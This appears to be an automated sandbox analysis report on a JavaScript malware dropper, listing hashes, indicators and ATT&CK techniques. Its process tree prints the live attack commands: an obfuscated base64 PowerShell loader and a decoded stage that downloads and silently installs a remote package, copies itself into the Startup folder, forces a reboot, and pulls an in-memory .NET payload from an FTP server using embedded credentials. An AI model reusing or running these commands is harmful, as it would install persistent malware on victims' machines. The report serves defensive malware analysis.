f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331

General

Target

f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js
Size

12KB
MD5

4e37cf7563ad5ebcde8bfcb51a515c48
SHA1

b9f758dd64b60da7da2f01b680d45abaf854f41e
SHA256

f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331
SHA512

9f63413b1759b8c467a7aa146a12f709ce5a929a928f70ea00799b6246eab3d04afea884d78a87e23ab4cb5fcb8b51269d2a5221b0bb93f9cca7c3468d2359fe
SSDEEP

192:ucRB3t9iHOI42vmKrSPpOiutE+xhYB1+FXY24AoegYPZWXH:vFgG0ltJx832/7gYBy

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2284 powershell.exe
2332 powershell.exe
2972 powershell.exe

pid	process
2284	powershell.exe
2332	powershell.exe
2972	powershell.exe

Drops file in Windows directory 3 IoCs

Processes:

wusa.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2284 powershell.exe
2332 powershell.exe
2792 powershell.exe
2972 powershell.exe

pid	process
2284	powershell.exe
2332	powershell.exe
2792	powershell.exe
2972	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

wscript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 496 wrote to memory of 2284	496	wscript.exe	powershell.exe
PID 496 wrote to memory of 2284	496	wscript.exe	powershell.exe
PID 496 wrote to memory of 2284	496	wscript.exe	powershell.exe
PID 2284 wrote to memory of 2332	2284	powershell.exe	powershell.exe
PID 2284 wrote to memory of 2332	2284	powershell.exe	powershell.exe
PID 2284 wrote to memory of 2332	2284	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2792	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2792	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2792	2332	powershell.exe	powershell.exe
PID 2792 wrote to memory of 2900	2792	powershell.exe	wusa.exe
PID 2792 wrote to memory of 2900	2792	powershell.exe	wusa.exe
PID 2792 wrote to memory of 2900	2792	powershell.exe	wusa.exe
PID 2332 wrote to memory of 2972	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2972	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2972	2332	powershell.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js
1⤵
- Suspicious use of WriteProcessMemory
PID:496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $vCHvw = 'J⅕BS⅕H⅕⅕RwBK⅕GI⅕I⅕⅕9⅕C⅕⅕J⅕Bo⅕G8⅕cwB0⅕C4⅕VgBl⅕HI⅕cwBp⅕G8⅕bg⅕u⅕E0⅕YQBq⅕G8⅕cg⅕u⅕EU⅕cQB1⅕GE⅕b⅕Bz⅕Cg⅕Mg⅕p⅕Ds⅕SQBm⅕C⅕⅕K⅕⅕k⅕FI⅕c⅕BH⅕Eo⅕Yg⅕p⅕C⅕⅕ew⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕SQBP⅕C4⅕U⅕Bh⅕HQ⅕a⅕Bd⅕Do⅕OgBH⅕GU⅕d⅕BU⅕GU⅕bQBw⅕F⅕⅕YQB0⅕Gg⅕K⅕⅕p⅕Ds⅕Z⅕Bl⅕Gw⅕I⅕⅕o⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕Ow⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕n⅕Gg⅕d⅕B0⅕H⅕⅕cw⅕6⅕C8⅕LwBk⅕HI⅕aQB2⅕GU⅕LgBn⅕G8⅕bwBn⅕Gw⅕ZQ⅕u⅕GM⅕bwBt⅕C8⅕dQBj⅕D8⅕ZQB4⅕H⅕⅕bwBy⅕HQ⅕PQBk⅕G8⅕dwBu⅕Gw⅕bwBh⅕GQ⅕JgBp⅕GQ⅕PQ⅕n⅕Ds⅕J⅕BI⅕FQ⅕WQBm⅕HY⅕I⅕⅕9⅕C⅕⅕J⅕Bl⅕G4⅕dg⅕6⅕F⅕⅕UgBP⅕EM⅕RQBT⅕FM⅕TwBS⅕F8⅕QQBS⅕EM⅕S⅕BJ⅕FQ⅕RQBD⅕FQ⅕VQBS⅕EU⅕LgBD⅕G8⅕bgB0⅕GE⅕aQBu⅕HM⅕K⅕⅕n⅕DY⅕N⅕⅕n⅕Ck⅕OwBp⅕GY⅕I⅕⅕o⅕CQ⅕S⅕BU⅕Fk⅕ZgB2⅕Ck⅕I⅕B7⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕PQ⅕g⅕Cg⅕J⅕Bo⅕FM⅕QQBI⅕H⅕⅕I⅕⅕r⅕C⅕⅕JwBX⅕DE⅕MQ⅕y⅕EE⅕Z⅕BQ⅕GY⅕SQ⅕w⅕F⅕⅕Qw⅕3⅕Gg⅕YgBz⅕GM⅕aQBf⅕DU⅕Xw⅕w⅕F8⅕ZQBV⅕Dc⅕TgB3⅕E0⅕WgBo⅕GY⅕N⅕B4⅕Cc⅕KQ⅕g⅕Ds⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ew⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕o⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕Kw⅕g⅕Cc⅕MQBi⅕HI⅕ag⅕1⅕Go⅕cQBu⅕HE⅕UgB4⅕EM⅕R⅕⅕2⅕FY⅕a⅕Bm⅕Gg⅕QQBu⅕DI⅕cgBj⅕FY⅕ZgBz⅕FI⅕bw⅕3⅕EQ⅕O⅕Bn⅕HI⅕Jw⅕p⅕C⅕⅕OwB9⅕Ds⅕J⅕Bm⅕Hc⅕UwBZ⅕H⅕⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BG⅕Gk⅕b⅕Bl⅕Cg⅕J⅕BV⅕FI⅕T⅕BL⅕EI⅕L⅕⅕g⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕I⅕⅕7⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕PQ⅕g⅕Cg⅕JwBD⅕Do⅕X⅕BV⅕HM⅕ZQBy⅕HM⅕X⅕⅕n⅕C⅕⅕Kw⅕g⅕Fs⅕RQBu⅕HY⅕aQBy⅕G8⅕bgBt⅕GU⅕bgB0⅕F0⅕Og⅕6⅕FU⅕cwBl⅕HI⅕TgBh⅕G0⅕ZQ⅕g⅕Ck⅕Ow⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕9⅕C⅕⅕K⅕⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕Cs⅕I⅕⅕n⅕Fw⅕VQBw⅕Hc⅕aQBu⅕C4⅕bQBz⅕HU⅕Jw⅕p⅕Ds⅕I⅕Bw⅕G8⅕dwBl⅕HI⅕cwBo⅕GU⅕b⅕Bs⅕C4⅕ZQB4⅕GU⅕I⅕B3⅕HU⅕cwBh⅕C4⅕ZQB4⅕GU⅕I⅕⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕v⅕HE⅕dQBp⅕GU⅕d⅕⅕g⅕C8⅕bgBv⅕HI⅕ZQBz⅕HQ⅕YQBy⅕HQ⅕I⅕⅕7⅕C⅕⅕QwBv⅕H⅕⅕eQ⅕t⅕Ek⅕d⅕Bl⅕G0⅕I⅕⅕n⅕CU⅕R⅕BD⅕F⅕⅕SgBV⅕CU⅕Jw⅕g⅕C0⅕R⅕Bl⅕HM⅕d⅕Bp⅕G4⅕YQB0⅕Gk⅕bwBu⅕C⅕⅕K⅕⅕g⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BB⅕H⅕⅕c⅕BE⅕GE⅕d⅕Bh⅕Fw⅕UgBv⅕GE⅕bQBp⅕G4⅕ZwBc⅕E0⅕aQBj⅕HI⅕bwBz⅕G8⅕ZgB0⅕Fw⅕VwBp⅕G4⅕Z⅕Bv⅕Hc⅕cwBc⅕FM⅕d⅕Bh⅕HI⅕d⅕⅕g⅕E0⅕ZQBu⅕HU⅕X⅕BQ⅕HI⅕bwBn⅕HI⅕YQBt⅕HM⅕X⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕Cc⅕I⅕⅕p⅕C⅕⅕LQBm⅕G8⅕cgBj⅕GU⅕I⅕⅕7⅕H⅕⅕bwB3⅕GU⅕cgBz⅕Gg⅕ZQBs⅕Gw⅕LgBl⅕Hg⅕ZQ⅕g⅕C0⅕YwBv⅕G0⅕bQBh⅕G4⅕Z⅕⅕g⅕Cc⅕cwBs⅕GU⅕ZQBw⅕C⅕⅕MQ⅕4⅕D⅕⅕Jw⅕7⅕C⅕⅕cwBo⅕HU⅕d⅕Bk⅕G8⅕dwBu⅕C4⅕ZQB4⅕GU⅕I⅕⅕v⅕HI⅕I⅕⅕v⅕HQ⅕I⅕⅕w⅕C⅕⅕LwBm⅕C⅕⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ewBb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBT⅕GU⅕cgB2⅕Gk⅕YwBl⅕F⅕⅕bwBp⅕G4⅕d⅕BN⅕GE⅕bgBh⅕Gc⅕ZQBy⅕F0⅕Og⅕6⅕FM⅕ZQBy⅕HY⅕ZQBy⅕EM⅕ZQBy⅕HQ⅕aQBm⅕Gk⅕YwBh⅕HQ⅕ZQBW⅕GE⅕b⅕Bp⅕GQ⅕YQB0⅕Gk⅕bwBu⅕EM⅕YQBs⅕Gw⅕YgBh⅕GM⅕aw⅕g⅕D0⅕I⅕B7⅕CQ⅕d⅕By⅕HU⅕ZQB9⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕E4⅕ZQB0⅕C4⅕UwBl⅕HI⅕dgBp⅕GM⅕ZQBQ⅕G8⅕aQBu⅕HQ⅕TQBh⅕G4⅕YQBn⅕GU⅕cgBd⅕Do⅕OgBT⅕GU⅕YwB1⅕HI⅕aQB0⅕Hk⅕U⅕By⅕G8⅕d⅕Bv⅕GM⅕bwBs⅕C⅕⅕PQ⅕g⅕Fs⅕UwB5⅕HM⅕d⅕Bl⅕G0⅕LgBO⅕GU⅕d⅕⅕u⅕FM⅕ZQBj⅕HU⅕cgBp⅕HQ⅕eQBQ⅕HI⅕bwB0⅕G8⅕YwBv⅕Gw⅕V⅕B5⅕H⅕⅕ZQBd⅕Do⅕OgBU⅕Gw⅕cw⅕x⅕DI⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕g⅕D0⅕I⅕⅕o⅕E4⅕ZQB3⅕C0⅕TwBi⅕Go⅕ZQBj⅕HQ⅕I⅕BO⅕GU⅕d⅕⅕u⅕Fc⅕ZQBi⅕EM⅕b⅕Bp⅕GU⅕bgB0⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBD⅕HI⅕ZQBk⅕GU⅕bgB0⅕Gk⅕YQBs⅕HM⅕I⅕⅕9⅕C⅕⅕bgBl⅕Hc⅕LQBv⅕GI⅕agBl⅕GM⅕d⅕⅕g⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBO⅕GU⅕d⅕B3⅕G8⅕cgBr⅕EM⅕cgBl⅕GQ⅕ZQBu⅕HQ⅕aQBh⅕Gw⅕K⅕⅕n⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕MQ⅕n⅕Cw⅕JwBk⅕GU⅕dgBl⅕Gw⅕bwBw⅕GU⅕cgBw⅕HI⅕bw⅕y⅕DE⅕NQ⅕3⅕Dg⅕SgBw⅕E⅕⅕Q⅕⅕n⅕Ck⅕Ow⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕D0⅕I⅕⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BT⅕HQ⅕cgBp⅕G4⅕Zw⅕o⅕C⅕⅕JwBm⅕HQ⅕c⅕⅕6⅕C8⅕LwBk⅕GU⅕cwBj⅕Gs⅕dgBi⅕HI⅕YQB0⅕DE⅕Q⅕Bm⅕HQ⅕c⅕⅕u⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕LgBj⅕G8⅕bQ⅕u⅕GI⅕cg⅕v⅕FU⅕c⅕Bj⅕HI⅕eQBw⅕HQ⅕ZQBy⅕C8⅕M⅕⅕y⅕C8⅕R⅕BM⅕Ew⅕M⅕⅕x⅕C4⅕d⅕B4⅕HQ⅕Jw⅕g⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕GQ⅕aQBz⅕H⅕⅕bwBz⅕GU⅕K⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕I⅕⅕9⅕C⅕⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕FQ⅕ZQB4⅕HQ⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕XQ⅕6⅕Do⅕VQBU⅕EY⅕O⅕⅕7⅕CQ⅕TQBX⅕GY⅕dQBh⅕C⅕⅕PQ⅕g⅕CQ⅕dwBW⅕F⅕⅕b⅕B1⅕C4⅕R⅕Bv⅕Hc⅕bgBs⅕G8⅕YQBk⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕Ck⅕OwBb⅕EI⅕eQB0⅕GU⅕WwBd⅕F0⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕QwBv⅕G4⅕dgBl⅕HI⅕d⅕Bd⅕Do⅕OgBG⅕HI⅕bwBt⅕EI⅕YQBz⅕GU⅕Ng⅕0⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕u⅕FI⅕ZQBw⅕Gw⅕YQBj⅕GU⅕K⅕⅕g⅕Cc⅕kyE6⅕JMhJw⅕g⅕Cw⅕I⅕⅕n⅕EE⅕Jw⅕g⅕Ck⅕I⅕⅕p⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕EE⅕c⅕Bw⅕EQ⅕bwBt⅕GE⅕aQBu⅕F0⅕Og⅕6⅕EM⅕dQBy⅕HI⅕ZQBu⅕HQ⅕R⅕Bv⅕G0⅕YQBp⅕G4⅕LgBM⅕G8⅕YQBk⅕Cg⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕Ck⅕LgBH⅕GU⅕d⅕BU⅕Hk⅕c⅕Bl⅕Cg⅕I⅕⅕n⅕EM⅕b⅕Bh⅕HM⅕cwBM⅕Gk⅕YgBy⅕GE⅕cgB5⅕DM⅕LgBD⅕Gw⅕YQBz⅕HM⅕MQ⅕n⅕C⅕⅕KQ⅕u⅕Ec⅕ZQB0⅕E0⅕ZQB0⅕Gg⅕bwBk⅕Cg⅕I⅕⅕n⅕H⅕⅕cgBG⅕FY⅕SQ⅕n⅕C⅕⅕KQ⅕u⅕Ek⅕bgB2⅕G8⅕awBl⅕Cg⅕J⅕Bu⅕HU⅕b⅕Bs⅕Cw⅕I⅕Bb⅕G8⅕YgBq⅕GU⅕YwB0⅕Fs⅕XQBd⅕C⅕⅕K⅕⅕g⅕Cc⅕Mg⅕y⅕CU⅕OQ⅕3⅕D⅕⅕MwBj⅕GY⅕N⅕⅕0⅕GI⅕Z⅕⅕z⅕DU⅕YQ⅕1⅕GM⅕N⅕⅕3⅕DQ⅕Ng⅕y⅕GI⅕NwBi⅕GU⅕O⅕⅕y⅕Dk⅕O⅕⅕x⅕DI⅕Zg⅕2⅕DI⅕Mg⅕l⅕D0⅕dg⅕m⅕GQ⅕YQBv⅕Gw⅕bgB3⅕G8⅕Z⅕⅕9⅕GU⅕YwBy⅕HU⅕bwBz⅕CY⅕d⅕B4⅕HQ⅕Lg⅕0⅕DI⅕M⅕⅕y⅕C4⅕Nw⅕w⅕C4⅕M⅕⅕z⅕Dc⅕Mg⅕l⅕Dc⅕Mg⅕l⅕Dg⅕LQBG⅕FQ⅕VQBE⅕DM⅕JQBB⅕DI⅕JQBl⅕G0⅕YQBu⅕GU⅕b⅕Bp⅕GY⅕KwBC⅕DM⅕JQ⅕y⅕DI⅕JQB0⅕Hg⅕d⅕⅕u⅕DQ⅕Mg⅕w⅕DI⅕Lg⅕3⅕D⅕⅕Lg⅕w⅕DM⅕Mg⅕y⅕CU⅕R⅕⅕z⅕CU⅕ZQBt⅕GE⅕bgBl⅕Gw⅕aQBm⅕Cs⅕Qg⅕z⅕CU⅕d⅕Bu⅕GU⅕bQBo⅕GM⅕YQB0⅕HQ⅕YQ⅕9⅕G4⅕bwBp⅕HQ⅕aQBz⅕G8⅕c⅕Bz⅕Gk⅕Z⅕⅕t⅕HQ⅕bgBl⅕HQ⅕bgBv⅕GM⅕LQBl⅕HM⅕bgBv⅕H⅕⅕cwBl⅕HI⅕PwB0⅕Hg⅕d⅕⅕u⅕GU⅕N⅕⅕1⅕DM⅕N⅕⅕y⅕DQ⅕Mg⅕3⅕Dk⅕O⅕⅕1⅕C0⅕NQBl⅕Dc⅕OQ⅕t⅕GY⅕Yw⅕2⅕DQ⅕LQ⅕0⅕DU⅕N⅕⅕4⅕C0⅕M⅕⅕5⅕Dc⅕ZgBh⅕D⅕⅕NQ⅕1⅕C8⅕bwBR⅕E8⅕MgBM⅕HU⅕M⅕Bv⅕C8⅕cwBt⅕GU⅕d⅕Bp⅕C8⅕bQBv⅕GM⅕LgB0⅕Gg⅕ZwBp⅕Ho⅕LgBu⅕GQ⅕Yw⅕u⅕D⅕⅕bg⅕u⅕DE⅕cgB0⅕C4⅕NwBw⅕C8⅕Lw⅕6⅕HM⅕c⅕B0⅕HQ⅕a⅕⅕n⅕C⅕⅕L⅕⅕g⅕Cc⅕JQBE⅕EM⅕U⅕BK⅕FU⅕JQ⅕n⅕Cw⅕I⅕⅕n⅕FQ⅕cgB1⅕GU⅕MQ⅕n⅕C⅕⅕KQ⅕g⅕Ck⅕OwB9⅕Ds⅕';$vCHvw = $vCHvw.replace('⅕','A') ;$vCHvw = [System.Convert]::FromBase64String( $vCHvw ) ;;;$vCHvw = [System.Text.Encoding]::Unicode.GetString( $vCHvw ) ;$vCHvw = $vCHvw.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js') ;powershell $vCHvw
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$RpGJb = $host.Version.Major.Equals(2);If ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($HTYfv) {$hSAHp = ($hSAHp + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient) ;$fwSYp.Encoding = [System.Text.Encoding]::UTF8 ;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$wVPlu.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$MWfua = $wVPlu.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$wVPlu.dispose();$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$MWfua = $wVPlu.DownloadString( $MWfua );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $MWfua.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%9703cf44bd35a5c47462b7be829812f622%=v&daolnwod=ecruos&txt.4202.70.0372%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.70.0322%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.e45342427985-5e79-fc64-4548-097fa055/oQO2Lu0o/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331.js', 'True1' ) );};"
3⤵
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\wusa.exe
"C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
5⤵
- Drops file in Windows directory
PID:2900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fbb51d79e0499f250aaff5040dae13ed

SHA1
27f214d0f26406be98f0e1afc2da915d38b4ddd3

SHA256
04a6d8c81f6b8d6564e6ea0cbfb485b214198b7a1fc638e8dd27b10494eb8c4d

SHA512
67218409389fe496d80243ad881f8da0bf2632002927886333d88e5633c6348cb4c87cb6b6c8d6127a9abaad807dab5825561b3f80d33947a845be06e35d0b1d

Download Submit
memory/2284-4-0x000007FEF686E000-0x000007FEF686F000-memory.dmp

Filesize
4KB

Download
memory/2284-5-0x000000001B460000-0x000000001B742000-memory.dmp

Filesize
2.9MB

Download
memory/2284-7-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2284-6-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2284-8-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2284-11-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2284-10-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2284-9-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2284-29-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2284-30-0x000007FEF686E000-0x000007FEF686F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads